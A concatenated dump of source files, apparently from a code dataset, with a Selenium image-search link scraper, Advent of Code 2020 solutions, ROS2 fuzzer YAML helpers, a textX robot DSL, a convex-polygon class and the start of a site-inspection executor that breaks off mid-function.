if no_gui:
chrome_options.add_argument('--headless')
if proxy:
chrome_options.add_argument("--proxy-server={}".format(proxy))
self.browser = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=chrome_options)
browser_version = 'Failed to detect version'
chromedriver_version = 'Failed to detect version'
major_version_different = False
if 'browserVersion' in self.browser.capabilities:
browser_version = str(self.browser.capabilities['browserVersion'])
if 'chrome' in self.browser.capabilities:
if 'chromedriverVersion' in self.browser.capabilities['chrome']:
chromedriver_version = str(self.browser.capabilities['chrome']['chromedriverVersion']).split(' ')[0]
if browser_version.split('.')[0] != chromedriver_version.split('.')[0]:
major_version_different = True
print('_________________________________')
print('Current web-browser version:\t{}'.format(browser_version))
print('Current chrome-driver version:\t{}'.format(chromedriver_version))
if major_version_different:
print('warning: Version different')
print(
'Download correct version at "http://chromedriver.chromium.org/downloads" and place in "./chromedriver"')
print('_________________________________')
def get_scroll(self):
pos = self.browser.execute_script("return window.pageYOffset;")
return pos
def wait_and_click(self, xpath):
# Sometimes click fails unreasonably. So tries to click at all cost.
try:
w = WebDriverWait(self.browser, 15)
elem = w.until(EC.element_to_be_clickable((By.XPATH, xpath)))
self.highlight(elem)
elem.click()
except Exception as e:
print('Click time out - {}'.format(xpath))
print('Exception {}'.format(e))
print('Refreshing browser...')
self.browser.refresh()
time.sleep(2)
return self.wait_and_click(xpath)
return elem
def highlight(self, element):
self.browser.execute_script("arguments[0].setAttribute('style', arguments[1]);", element,
"background: yellow; border: 2px solid red;")
@staticmethod
def remove_duplicates(_list):
return list(dict.fromkeys(_list))
def google(self, keyword, add_url="", max_count=10000):
self.browser.get("https://www.google.com/search?q={}&source=lnms&tbm=isch{}".format(keyword, add_url))
time.sleep(1)
print('Scrolling down')
elem = self.browser.find_element_by_tag_name("body")
for i in range(60):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
try:
# You may need to change this. Because google image changes rapidly.
# btn_more = self.browser.find_element(By.XPATH, '//input[@value="결과 더보기"]')
# self.wait_and_click('//input[@id="smb"]')
self.wait_and_click('//input[@type="button"]')
except ElementNotVisibleException:
pass
while True:
for i in range(60):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
photo_grid_boxes = self.browser.find_elements(By.XPATH, '//div[@class="bRMDJf islir"]')
if len(photo_grid_boxes) > max_count: break
print('Scraping links')
links = []
for box in photo_grid_boxes:
try:
imgs = box.find_elements(By.TAG_NAME, 'img')
for img in imgs:
# self.highlight(img)
src = img.get_attribute("src")
# Google seems to preload 20 images as base64
if str(src).startswith('data:'):
src = img.get_attribute("data-iurl")
links.append(src)
except Exception as e:
print('[Exception occurred while collecting links from google] {}'.format(e))
links = self.remove_duplicates(links)
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('google', keyword, len(links)))
self.browser.close()
return links
def naver(self, keyword, add_url="", max_count=10000):
self.browser.get(
"https://search.naver.com/search.naver?where=image&sm=tab_jum&query={}{}".format(keyword, add_url))
time.sleep(1)
print('Scrolling down')
elem = self.browser.find_element_by_tag_name("body")
while True:
for i in range(60):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
imgs = self.browser.find_elements(By.XPATH,
'//div[@class="photo_bx api_ani_send _photoBox"]//img[@class="_image _listImage"]')
if len(imgs) > max_count: break
print('Scraping links')
links = []
for img in imgs:
try:
src = img.get_attribute("src")
if src[0] != 'd':
links.append(src)
except Exception as e:
print('[Exception occurred while collecting links from naver] {}'.format(e))
links = self.remove_duplicates(links)
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('naver', keyword, len(links)))
self.browser.close()
return links
def unsplash(self, keyword, add_url="", srcset_idx=0, max_count=10000):
self.browser.get("https://unsplash.com/s/photos/{}".format(keyword)) # , add_url
time.sleep(1)
print('Scrolling down')
elem = self.browser.find_element_by_tag_name("body")
for i in range(60):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
try:
# You may need to change this. Because google image changes rapidly.
# btn_more = self.browser.find_element(By.XPATH, '//input[@value="결과 더보기"]')
# self.wait_and_click('//input[@id="smb"]')
# self.wait_and_click('//div[@class="gDCZZ"]/button')
button = self.browser.find_element_by_xpath('//div[@class="gDCZZ"]//button')
self.highlight(button)
time.sleep(1)
button.send_keys(Keys.ENTER)
except Exception as e:
print(e)
# pass
# reached_page_end = False
# last_height = self.browser.execute_script("return document.body.scrollHeight")
while True:
# for i in range(30):
# elem.send_keys(Keys.PAGE_DOWN)
# time.sleep(0.4)
# time.sleep(1)
photo_grid_boxes = self.browser.find_elements(By.XPATH, '//div[@class="ripi6"]//figure[@itemprop="image"]')
# new_height = self.browser.execute_script("return document.body.scrollHeight")
# if last_height == new_height:
# reached_page_end = True
# else:
# last_height = new_height
try:
loading = self.browser.find_element_by_xpath('//div[@class="MvqOi"]') # loading icon
self.browser.execute_script("arguments[0].scrollIntoView(true);", loading)
elem.send_keys(Keys.PAGE_UP)
time.sleep(1)
except:
break
if len(photo_grid_boxes) > max_count:
break
else:
continue
print('Scraping links')
links = []
for box in photo_grid_boxes:
try:
imgs = box.find_elements(By.XPATH, './/img[@class="YVj9w"]') # By.TAG_NAME, 'img')
for img in imgs:
# self.highlight(img)
src = img.get_attribute("srcset")
src = src.split(', ')[srcset_idx].split(' ')[:-1] # 800w
src = ' '.join(src)
# Google seems to preload 20 images as base64
if str(src).startswith('data:'):
src = img.get_attribute("data-iurl")
links.append(src)
except Exception as e:
print('[Exception occurred while collecting links from unsplash] {}'.format(e))
links = self.remove_duplicates(links)
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('unsplash', keyword, len(links)))
self.browser.close()
return links
def flickr(self, keyword, add_url="", max_count=10000, full=False):
self.browser.get("https://www.flickr.com/search/?text={}&media=photos{}".format(keyword, add_url))
time.sleep(1)
print('Scrolling down')
elem = self.browser.find_element_by_tag_name("body")
for i in range(60):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
# try:
# button = self.browser.find_element_by_xpath('.//div[@class="infinite-scroll-load-more"]/button')
# self.highlight(button)
# time.sleep(1)
# self.browser.execute_script("arguments[0].click();", button)
# except:
# pass
# # ActionChains(self.browser).move_to_element(button).click(button).perform()
# for i in range(100):
# elem.send_keys(Keys.PAGE_DOWN)
# time.sleep(0.2)
time.sleep(2)
# reached_page_end = False
# last_height = self.browser.execute_script("return document.body.scrollHeight")
while True:
imgs = self.browser.find_elements(By.XPATH,
'//div[@class="view photo-list-photo-view awake"]')
if len(imgs) > max_count:
break
self.browser.execute_script("arguments[0].scrollIntoView(true);", imgs[-1])
last_height = self.browser.execute_script("return document.body.scrollHeight")
time.sleep(1)
for i in range(2):
elem.send_keys(Keys.PAGE_DOWN)
time.sleep(0.2)
new_height = self.browser.execute_script("return document.body.scrollHeight")
if not last_height == new_height:
continue
# reached_page_end = True
# else:
# last_height = new_height
try:
button = self.browser.find_element_by_xpath('//div[@class="infinite-scroll-load-more"]//button')
# self.browser.execute_script("arguments[0].click();", button)
button.send_keys(Keys.ENTER)
time.sleep(0.5)
except Exception as e:
# print(e)
try:
self.browser.find_element_by_xpath('//div[@class="flickr-dots"]')
except:
print('No buttons and loading..')
print(e)
break
else:
while True:
self.browser.find_element_by_xpath('//div[@class="flickr-dots"]')
time.sleep(3)
imgs = self.browser.find_elements(By.XPATH,
'//div[@class="view photo-list-photo-view awake"]')
print('Scraping links')
links = []
if full:
print('[Full Resolution Mode]')
self.browser.maximize_window()
# self.wait_and_click('//div[@class="view photo-list-photo-view awake"]//a')
# time.sleep(1)
first_img = self.browser.find_element_by_xpath('//div[@class="view photo-list-photo-view awake"]//a')
self.highlight(first_img)
time.sleep(2)
self.browser.execute_script("arguments[0].click();", first_img)
while True:
try:
w = WebDriverWait(self.browser, 5)
xpath = '//div[@class="view photo-well-scrappy-view"]//img[@class="main-photo"]'
img_low = w.until(EC.presence_of_element_located((By.XPATH, xpath)))
src_low = img_low.get_attribute('src')
src_low = src_low.split('.')
src_low[-2] = '_'.join(src_low[-2].split('_')[:-1])
src_low = '.'.join(src_low)
w = WebDriverWait(self.browser, 3)
xpath = '//div[@class="engagement-item download "]//i[@class="ui-icon-download"]'
down_icon = w.until(EC.presence_of_element_located((By.XPATH, xpath)))
self.highlight(down_icon)
down_icon.click()
except StaleElementReferenceException:
# print('[Expected Exception - StaleElementReferenceException]')
pass
except Exception as e:
print('[Exception occurred while collecting links from flickr_full] {}'.format(e))
time.sleep(1)
else:
try:
xpath = '//div[@class="content html-only auto-size"]'
link_list = w.until(EC.presence_of_element_located((By.XPATH, xpath)))
self.highlight(link_list)
a_link = link_list.find_element((By.XPATH, '//li[@class="원본"]/a'))
self.highlight(a_link)
src = a_link.get_attribute('href')
except:
src = src_low
escape = self.browser.find_element_by_xpath('//div[@class="fluid-modal-overlay transparent"]')
escape.click()
if src is not None:
if not str(src).startswith('https:'):
src = "https:" + str(src)
links.append(src)
print('%d: %s' % (len(links), src))
if len(links) > max_count:
break
try:
self.browser.find_element_by_xpath('//a[@class="navigate-target navigate-next"]')
except:
print('!!!!!!!!!!!!!')
time.sleep(10)
break
elem.send_keys(Keys.RIGHT)
while True:
loader_bar = self.browser.find_element_by_xpath('//div[@class="loader-bar"]')
if loader_bar.get_attribute('display') == None:
time.sleep(0.1)
break
# time.sleep(0.5)
else:
for img in imgs:
try:
src = img.get_attribute('style').split('background-image: url("')[-1]
src = ''.join(src[:-3]) # get_attribute("style")["background-image"]
if not str(src).startswith('https:'):
src = "https:" + str(src)
links.append(src)
except Exception as e:
print('[Exception occurred while collecting links from flickr] {}'.format(e))
links = self.remove_duplicates(links)
if full:
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('flickr_full', keyword, len(links)))
else:
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('flickr', keyword, len(links)))
self.browser.close()
print('# links', len(links))
return links
def google_full(self, keyword, add_url="", max_count=10000):
print('[Full Resolution Mode]')
self.browser.get("https://www.google.com/search?q={}&tbm=isch{}".format(keyword, add_url))
time.sleep(1)
elem = self.browser.find_element_by_tag_name("body")
print('Scraping links')
self.wait_and_click('//div[@data-ri="0"]')
time.sleep(1)
links = []
count = 1
last_scroll = 0
scroll_patience = 0
while True:
try:
xpath = '//div[@id="islsp"]//div[@class="v4dQwb"]'
div_box = self.browser.find_element(By.XPATH, xpath)
self.highlight(div_box)
xpath = '//img[@class="n3VNCb"]'
img = div_box.find_element(By.XPATH, xpath)
self.highlight(img)
xpath = '//div[@class="k7O2sd"]'
loading_bar = div_box.find_element(By.XPATH, xpath)
# Wait for image to load. If not it will display base64 code.
while str(loading_bar.get_attribute('style')) != 'display: none;':
time.sleep(0.1)
src = img.get_attribute('src')
if src is not None:
links.append(src)
# print('%d: %s' % (count, src))
count += 1
except StaleElementReferenceException:
# print('[Expected Exception - StaleElementReferenceException]')
pass
except Exception as e:
print('[Exception occurred while collecting links from google_full] {}'.format(e))
scroll = self.get_scroll()
if scroll == last_scroll:
scroll_patience += 1
else:
scroll_patience = 0
last_scroll = scroll
if scroll_patience >= 50 or len(links) > max_count:
break
elem.send_keys(Keys.RIGHT)
links = self.remove_duplicates(links)
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('google_full', keyword, len(links)))
self.browser.close()
return links
def naver_full(self, keyword, add_url="", max_count=10000):
print('[Full Resolution Mode]')
self.browser.get(
"https://search.naver.com/search.naver?where=image&sm=tab_jum&query={}{}".format(keyword, add_url))
time.sleep(1)
elem = self.browser.find_element_by_tag_name("body")
print('Scraping links')
self.wait_and_click('//div[@class="photo_bx api_ani_send _photoBox"]')
time.sleep(1)
links = []
count = 1
last_scroll = 0
scroll_patience = 0
while True:
try:
xpath = '//div[@class="image _imageBox"]/img[@class="_image"]'
imgs = self.browser.find_elements(By.XPATH, xpath)
for img in imgs:
self.highlight(img)
src = img.get_attribute('src')
if src not in links and src is not None:
links.append(src)
# print('%d: %s' % (count, src))
count += 1
except StaleElementReferenceException:
# print('[Expected Exception - StaleElementReferenceException]')
pass
except Exception as e:
print('[Exception occurred while collecting links from naver_full] {}'.format(e))
scroll = self.get_scroll()
if scroll == last_scroll:
scroll_patience += 1
else:
scroll_patience = 0
last_scroll = scroll
if scroll_patience >= 100 or len(links) > max_count:
break
elem.send_keys(Keys.RIGHT)
elem.send_keys(Keys.PAGE_DOWN)
links = self.remove_duplicates(links)
print('Collect links done. Site: {}, Keyword: {}, Total: {}'.format('naver_full', keyword, len(links)))
self.browser.close()
return links
def unsplash_full(self, keyword, add_url="", max_count=10000):
return self.unsplash(keyword, add_url, srcset_idx=-1, max_count=max_count)
def flickr_full(self, keyword, add_url="", max_count=10000):
return self.flickr(keyword, add_url, max_count, full=True)
if __name__ == '__main__':
collect = CollectLinks()
links = collect.naver_full('박보영')
print(len(links), links)
``` |
{
"source": "JnxF/advent-of-code-2020",
"score": 3
} |
#### File: JnxF/advent-of-code-2020/day04.py
```python
from aocd.models import Puzzle
import re
input: str = Puzzle(day=4, year=2020).input_data
fields = "byr iyr eyr hgt hcl ecl pid cid"
fields = set(fields.split(" "))
def part1():
passports = input.split("\n\n")
passports = [" ".join(t.split("\n")) for t in passports]
passports = [t.split(" ") for t in passports]
passports = [[w.split(":")[0] for w in t] for t in passports]
validPassports = [t for t in passports if set(t + ["cid"]) == fields]
return len(validPassports)
def part2():
rules = [
("byr", lambda x: 1920 <= int(x) <= 2002),
("iyr", lambda x: 2010 <= int(x) <= 2020),
("eyr", lambda x: 2020 <= int(x) <= 2030),
(
"hgt",
lambda x: len(x) > 2
and (
150 <= int(x[:-2]) <= 193 if x[-2:] == "cm" else 59 <= int(x[:-2]) <= 76
),
),
(
"hcl",
lambda x: len(x) == 7
and x[0] == "#"
and all(c in "0123456789abcdef" for c in x[1:]),
),
("ecl", lambda x: x in "amb blu brn gry grn hzl oth"),
("pid", lambda x: len(x) == 9 and all("0" <= c <= "9" for c in x)),
]
return sum(
all(key in passport and f(passport[key]) for key, f in rules)
for passport in (
dict(map(lambda x: x.split(":"), part))
for part in map(str.split, input.split("\n\n"))
)
)
```
#### File: JnxF/advent-of-code-2020/day09.py
```python
from aocd.models import Puzzle
input: str = Puzzle(day=9, year=2020).input_data
input = input.splitlines()
input = [int(line) for line in input]
preamble = 25
n = len(input)
def part1():
for idx in range(preamble, n):
current = input[idx]
currentPreamble = input[idx - preamble : idx]
s = set(currentPreamble)
isSumOfTwoPrevious = False
for previous in currentPreamble:
if (current - previous) in s and previous != current / 2:
isSumOfTwoPrevious = True
break
if not isSumOfTwoPrevious:
return current
def part2():
invalidIndex = part1()
carrySum = 0
value2Idx = dict()
for idx, current in enumerate(input):
carrySum += current
value2Idx[carrySum] = idx
if carrySum - invalidIndex in value2Idx.keys():
previousIndex = value2Idx[carrySum - invalidIndex] + 1
contiguousSet = input[previousIndex : idx + 1]
return min(contiguousSet) + max(contiguousSet)
```
#### File: JnxF/advent-of-code-2020/day11.py
```python
from aocd.models import Puzzle
from copy import deepcopy
input: str = Puzzle(day=11, year=2020).input_data
input = input.splitlines()
input = [list(line) for line in input]
n = len(input)
m = len(input[0])
def adjacent(i, j, state):
ret = []
for I in [i - 1, i, i + 1]:
for J in [j - 1, j, j + 1]:
if (i, j) != (I, J) and I >= 0 and J >= 0 and I < n and J < m:
ret.append(state[I][J])
return ret.count("#")
def iterate1(previousState):
nextState = deepcopy(previousState)
for i in range(n):
for j in range(m):
adjacentOccupiedCount = adjacent(i, j, previousState)
if previousState[i][j] == "L" and adjacentOccupiedCount == 0:
nextState[i][j] = "#"
elif previousState[i][j] == "#" and adjacentOccupiedCount >= 4:
nextState[i][j] = "L"
return nextState
def part1():
state = deepcopy(input)
previousCount = 0
while True:
state = iterate1(state)
currentSum = sum([line.count("#") for line in state])
if currentSum == previousCount:
return currentSum
previousCount = currentSum
def adjacent2(i, j, state):
total = 0
for di in [-1, 0, 1]:
for dj in [-1, 0, 1]:
if di == dj == 0:
continue
(I, J) = (i + di, j + dj)
while I >= 0 and J >= 0 and I < n and J < m and state[I][J] == ".":
(I, J) = (I + di, J + dj)
if I >= 0 and J >= 0 and I < n and J < m and state[I][J] == "#":
total += 1
return total
def iterate2(previousState):
nextState = deepcopy(previousState)
for i in range(n):
for j in range(m):
adjacentOccupiedCount = adjacent2(i, j, previousState)
if previousState[i][j] == "L" and adjacentOccupiedCount == 0:
nextState[i][j] = "#"
elif previousState[i][j] == "#" and adjacentOccupiedCount >= 5:
nextState[i][j] = "L"
return nextState
def part2():
state = deepcopy(input)
previousCount = 0
while True:
state = iterate2(state)
currentSum = sum([line.count("#") for line in state])
if currentSum == previousCount:
return currentSum
previousCount = currentSum
```
#### File: JnxF/advent-of-code-2020/day17.py
```python
from aocd.models import Puzzle
input: str = Puzzle(day=17, year=2020).input_data
input = input.splitlines()
n = len(input)
m = len(input[0])
displacement = (n - 1) // 2
originalNodes = set()
for i in range(n):
for j in range(m):
if input[i][j] == "#":
originalNodes.add((j - displacement, i - displacement, 0))
def active_neighbours(point, allThePoints):
if len(point) == 3:
x, y, z = point
w = None
else:
x, y, z, w = point
neighbours = []
for X in [x - 1, x, x + 1]:
for Y in [y - 1, y, y + 1]:
for Z in [z - 1, z, z + 1]:
if w is not None:
for W in [w - 1, w, w + 1]:
neighbours.append(((X, Y, Z, W), point))
else:
neighbours.append(((X, Y, Z), point))
return len(
list(filter(lambda x: x[0] != x[1] and x[0] in allThePoints, neighbours))
)
def iterate(current, fourdimensions=False):
next = set()
neighbours = []
for point in current:
if fourdimensions:
x, y, z, w = point
else:
x, y, z = point
if active_neighbours(point, current) in [2, 3]:
next.add(point)
for X in [x - 1, x, x + 1]:
for Y in [y - 1, y, y + 1]:
for Z in [z - 1, z, z + 1]:
if not fourdimensions:
neighbours.append(((X, Y, Z), point))
else:
for W in [w - 1, w, w + 1]:
neighbours.append(((X, Y, Z, W), point))
neighbours = [
point
for (point, reference) in neighbours
if active_neighbours(point, current) == 3
and point != reference
and point not in current
]
next |= set(neighbours)
return next
def part1():
nodes = originalNodes.copy()
for _ in range(6):
nodes = iterate(nodes)
return len(nodes)
def part2():
nodes = set()
for (x, y, z) in originalNodes:
nodes.add((x, y, z, 0))
for _ in range(6):
nodes = iterate(nodes, fourdimensions=True)
return len(nodes)
``` |
{
"source": "JnxF/automatic_fuzzing",
"score": 3
} |
#### File: ros2_automatic_fuzzer/auto_detector/detect_parameters.py
```python
import sys
from zenlog import log as logging
import os
from PyInquirer import prompt
import yaml
sys.path.append("..")
from yaml_utils.yaml_utils import read_and_validate_yaml_file
def yes_no_question(message: str, default=True):
return prompt(
{
"type": "confirm",
"message": message,
"name": "question",
"default": False,
}
)["question"]
def detect_parameters(rootDir: str):
yaml_obj: dict = read_and_validate_yaml_file(rootDir)
services: dict = yaml_obj["services"]
topics: dict = yaml_obj["topics"]
logging.info("Detecting services' parameters")
for service_name, service_value in services.items():
if "parameters" in service_value and service_value["parameters"] != []:
question_prompt = f"*Overwrite* parameters for service `{service_name}`?"
else:
question_prompt = f"Detect parameters for service `{service_name}`?"
if yes_no_question(question_prompt, False):
# TODO
pass
for topic_name, topic_value in services.items():
if yes_no_question(f"Detect parameters for topic `{topic_name}`?", False):
# TODO
pass
yaml_path = os.path.join(rootDir, "fuzz.yaml")
with open(yaml_path, "w") as outfile:
yaml.dump(yaml_obj, outfile, sort_keys=False)
logging.info("The file `fuzz.yaml` has been overwritten")
def ask_detect_parameters(rootDir: str):
if yes_no_question("Do you want to autodetect parameters?", False):
detect_parameters(rootDir)
```
#### File: ros2_automatic_fuzzer/yaml_utils/yaml_utils.py
```python
from zenlog import log as logging
import os
import json
from zenlog import log as logging
import yamale
def ensure_yaml_exists(yaml_file_path: str) -> bool:
if not os.path.exists(yaml_file_path):
logging.error(
"No fuzz.yaml file was found\n" "Have you run the auto_detecter command?"
)
exit(-1)
logging.debug(f"YAML file found at {yaml_file_path}")
def read_schema_file():
yaml_path = os.path.join(os.path.dirname(__file__), "schema.yaml")
schema = yamale.make_schema(yaml_path)
logging.debug("YAML schema read")
return schema
def read_yaml_file(path: str):
res = yamale.make_data(path)
logging.debug(f"YAML file loaded")
return res
def validate_yaml(yaml_obj, schema):
yamale.validate(schema, yaml_obj)
logging.debug("YAML file validated")
def verify_yaml_file(yaml_file_path: str):
schema = read_schema_file()
yaml_objs = read_yaml_file(yaml_file_path)
validate_yaml(yaml_objs, schema)
# yaml_obj is a list of (object, path)
# so we return the first item's object
return yaml_objs[0][0]
def read_and_validate_yaml_file(path: str) -> dict:
yaml_file_path = os.path.join(path, "fuzz.yaml")
ensure_yaml_exists(yaml_file_path)
yaml_obj = verify_yaml_file(yaml_file_path)
if "TODO" in json.dumps(yaml_obj):
logging.warning(
"The 'TODO' keyword was found in the yaml file\n"
"Did you forget to fill in the blanks?"
)
services_keys = (yaml_obj["services"] if "services" in yaml_obj else {}).keys()
topics_keys = (yaml_obj["topics"] if "topics" in yaml_obj else {}).keys()
actions_keys = (yaml_obj["actions"] if "actions" in yaml_obj else {}).keys()
logging.debug(
f"{len(topics_keys)} topics detected: {', '.join([f'`{s}`' for s in topics_keys])}"
)
logging.debug(
f"{len(services_keys)} services detected: {', '.join([f'`{s}`' for s in services_keys])}"
)
logging.debug(
f"{len(actions_keys)} actions detected: {', '.join([f'`{s}`' for s in actions_keys])}"
)
return yaml_obj
``` |
{
"source": "JnxF/convex-polygons",
"score": 3
} |
#### File: JnxF/convex-polygons/ConvexPolygon.py
```python
from __future__ import annotations
from typing import List, Optional, Tuple
from functools import reduce
from PIL import Image, ImageDraw
from Point import Point
from copy import deepcopy
class ConvexPolygon:
def __init__(self, coordinates: List[Point]):
self.points = self._convex_hull(coordinates)
def __repr__(self):
return str(self.points) + " : " + str(self.num_vertices())
def __eq__(self, other):
if type(other) != ConvexPolygon:
return False
if len(self.points) != len(other.points):
return False
for (pa, pb) in zip(self.points, other.points):
if pa != pb:
return False
return True
@staticmethod
def _convex_hull(points):
TURN_LEFT, TURN_RIGHT, TURN_NONE = (1, -1, 0)
def cmp(a, b):
return (a > b) - (a < b)
def _turn(p, q, r):
return cmp((q.x - p.x) * (r.y - p.y) - (r.x - p.x) * (q.y - p.y), 0)
def _keep_left(hull, r):
while len(hull) > 1 and _turn(hull[-2], hull[-1], r) != TURN_LEFT:
hull.pop()
if not len(hull) or hull[-1] != r:
hull.append(r)
return hull
points = sorted(points)
l = reduce(_keep_left, points, [])
u = reduce(_keep_left, reversed(points), [])
return l.extend(u[i] for i in range(1, len(u) - 1)) or l
def inside_point(self, point: Point) -> bool:
pass
def num_vertices(self) -> int:
return len(self.points)
def num_edges(self) -> int:
n = self.num_vertices()
if n <= 1:
return 0
elif n == 2:
return 1
else:
return n
def perimeter(self) -> float:
n = self.num_vertices()
if n <= 1:
return 0
elif n == 2:
[v0, v1] = self.points
return v0.distance(v1)
else:
perimeter = 0.0
for idx, p in enumerate(self.points):
previous = self.points[-1] if idx == 0 else self.points[idx - 1]
perimeter += previous.distance(p)
return perimeter
def area(self) -> float:
n = self.num_vertices()
if n <= 2:
return 0
area = 0.0
for i in range(n - 1):
area += self.points[i].x * self.points[i + 1].y
area += self.points[n - 1].x * self.points[0].y
for i in range(n - 1):
area -= self.points[i + 1].x * self.points[i].y
area -= self.points[0].x * self.points[n - 1].y
return abs(area) / 2.0
def centroid(self) -> Optional[Point]:
n = self.num_vertices()
if n == 0:
return None
meanX, meanY = 0.0, 0.0
for p in self.points:
meanX += p.x
meanY += p.y
meanX /= n
meanY /= n
return Point(meanX, meanY)
def is_regular(self) -> bool:
n = self.num_vertices()
if n <= 1:
return True
if n == 2:
return False
# All vertices are to the same distance to each other
d = self.points[0].distance(self.points[1])
for idx, p in enumerate(self.points):
previous = self.points[-1] if idx == 0 else self.points[idx - 1]
if abs(previous.distance(p) - d) > 1e-7:
return False
return True
def bounding_box(self) -> Optional[Tuple[Point, Point]]:
n = self.num_vertices()
if n == 0:
return None
xs = [p.x for p in self.points]
ys = [p.y for p in self.points]
return (Point(min(xs), min(ys)), Point(max(xs), max(ys)))
def draw(self, outline="#000000"):
img = Image.new("RGB", (400, 400), "White")
dib = ImageDraw.Draw(img)
(pmin, pmax) = self.bounding_box()
dx = pmax.x - pmin.x
dy = pmax.y - pmin.y
myPol = [
(396.0 * (p.x - pmin.x) / dx + 2, 400 - (396.0 * (p.y - pmin.y) / dy + 2))
for p in self.points
]
dib.polygon(myPol, outline=outline)
img.save("image.png")
@staticmethod
def union(cp1: ConvexPolygon, cp2: ConvexPolygon):
return ConvexPolygon(deepcopy(cp1.points) + deepcopy(cp2.points))
if __name__ == "__main__":
print(ConvexPolygon([Point(0, 0), Point(0, 0)]))
``` |
{
"source": "JnxF/robot-dsl",
"score": 3
} |
#### File: robot-dsl/tx_robot/__init__.py
```python
from os.path import dirname, join
from textx import language, metamodel_from_file, TextXSemanticError, get_location
@language("Robot", "*.robot")
def robot():
"A language for defining robot behaviour"
def semantic_check(model, metamodel):
if model.name == "WrongMode":
raise TextXSemanticError(
'The root mode cannot be called "Wrong Mode".', **get_location(model)
)
def mode_obj_processor(mode):
if mode.name[0].islower():
raise TextXSemanticError(
f'Mode name "{mode.name}" must be capitalized.', **get_location(mode)
)
metamodel = metamodel_from_file(join(dirname(__file__), "robot.tx"))
metamodel.register_model_processor(semantic_check)
metamodel.register_obj_processors({"Mode": mode_obj_processor})
return metamodel
``` |
{
"source": "jnxnpn/MeTA",
"score": 3
} |
#### File: functionalities/importlib/importer.py
```python
import StringIO
import re
import datetime
class ImportException(Exception):
pass
class RowParseError(ImportException):
pass
class DataRecords(object):
'''Represents raw data records in the form of a dictionary.
(The raw data is not yet processed - it will be converted to package_dict
in the next step.)
'''
@property
def records(self):
'''Yields each record as a dict.'''
raise NotImplementedError
class PackageImporter(object):
'''Base class for an importer that converts a particular file type
and creates corresponding package dictionaries.'''
_log = []
def __init__(self, filepath=None, buf=None):
assert filepath or buf, 'Must specify a filepath or a buf.'
self._filepath = filepath
self._buf = buf
self.import_into_package_records()
def import_into_package_records(self):
'''Reads in the source file given by self._filepath and
stores the resulting DataRecords in self._package_data_records.'''
raise NotImplementedError()
@classmethod
def log(cls, msg):
cls._log.append(msg)
@classmethod
def get_log(cls):
return cls._log
@classmethod
def clear_log(cls):
cls._log = []
def record_2_package(self, record_dict):
'''Converts a raw record into a package dictionary.
@param record_dict - the raw record
@return - pkg_dict'''
raise NotImplementedError()
def pkg_dict(self):
'''Generates package dicts from the package data records.'''
for row_dict in self._package_data_records.records:
try:
yield self.record_2_package(row_dict)
except RowParseError, e:
print 'Error with row', e
raise StopIteration
@classmethod
def license_2_license_id(self, license_title, logger=None):
# import is here, as it creates a dependency on ckan, which
# many importers won't want
from ckan.model.license import LicenseRegister
licenses = LicenseRegister()
license_obj = licenses.get_by_title(license_title)
if license_obj:
return u'%s' % license_obj.id
else:
logger('Warning: No license name matches \'%s\'. Ignoring license.' % license_title)
@classmethod
def munge(self, name):
'''Munge a title into a name.
Note this function must be only carefully changed, as reimporting
data with a name munged differently may create duplicates packages.
For this reason, this munge function is for use by the importers only.
Other users should use the API slug creation functionality.
'''
# import is here, as it creates a dependency on ckan, which
# many importers won't want
import ckan.model as model
# convert spaces to underscores
name = re.sub(' ', '_', name).lower()
# convert symbols to dashes
name = re.sub('[:]', '_-', name).lower()
name = re.sub('[/]', '-', name).lower()
# take out not-allowed characters
name = re.sub('[^a-zA-Z0-9-_]', '', name).lower()
# remove double underscores
name = re.sub('__', '_', name).lower()
# if longer than max_length, keep last word if a year
max_length = model.PACKAGE_NAME_MAX_LENGTH - 5
# (make length less than max, in case we need a few for '_' chars
# to de-clash names.)
if len(name) > max_length:
year_match = re.match('.*?[_-]((?:\d{2,4}[-/])?\d{2,4})$', name)
if year_match:
year = year_match.groups()[0]
name = '%s-%s' % (name[:(max_length-len(year)-1)], year)
else:
name = name[:max_length]
return name
@classmethod
def name_munge(self, input_name):
'''Munges the name field in case it is not to spec.
Note this function must be only carefully changed, as reimporting
data with a name munged differently may create duplicates packages.
For this reason, this munge function is for use by the importers only.
Other users should use the API slug creation functionality.
'''
return self.munge(input_name.replace(' ', '').replace('.', '_').replace('&', 'and'))
@classmethod
def tidy_url(self, url, logger=None):
if url and not url.startswith('http') and not url.startswith('webcal:'):
if url.startswith('www.'):
url = url.replace('www.', 'http://www.')
else:
logger('Warning: URL doesn\'t start with http: %s' % url)
return url
``` |
{
"source": "jnxyp/NetInspectionHelper",
"score": 3
} |
#### File: NetInspectionHelper/src/executor.py
```python
from pprint import pprint
from PIL import Image
from config import MAX_RETRY, SCREENSHOT_FILENAME_PAGE, SCREENSHOT_FILENAME_SCREEN, \
SCREENSHOT_PAGE_TASKBAR_HEIGHT, SCREENSHOT_PAGE_TASKBAR_RESIZE_FACTOR, SCREENSHOT_PAGE_TASKBAR
from document_generator import InspectionReport
from sites import SITES, Site
from util import p
class Executor:
def __init__(self, companies: list, included_sites: list = SITES):
self.sites = included_sites
self.companies = companies
self.failed_sites = {company_name: list() for company_name in self.get_companies()}
self.failed_reports = []
def get_companies(self) -> list:
return self.companies
def get_sites(self) -> list:
return self.sites
def execute(self):
self.grab_all()
self.print_failed_summary()
def grab_all(self):
p("开始从{}个页面抓取{}个公司的信息".format(len(self.get_sites()), len(self.get_companies())))
for company_name in self.get_companies():
self.grab_sites(company_name)
self.generate_report(company_name)
p("\t{} 全部完成".format(company_name))
def grab_sites(self, company_name: str):
p("\t{}".format(company_name))
p("\t\t开始抓取公司信息".format(company_name))
for site in self.get_sites():
attempt = 1
try:
while attempt <= MAX_RETRY:
result = site.grab(company_name)
if result:
if SCREENSHOT_PAGE_TASKBAR:
self.append_taskbar(company_name, site)
break
p("\t\t第{}次尝试失败".format(attempt))
attempt += 1
if attempt > MAX_RETRY:
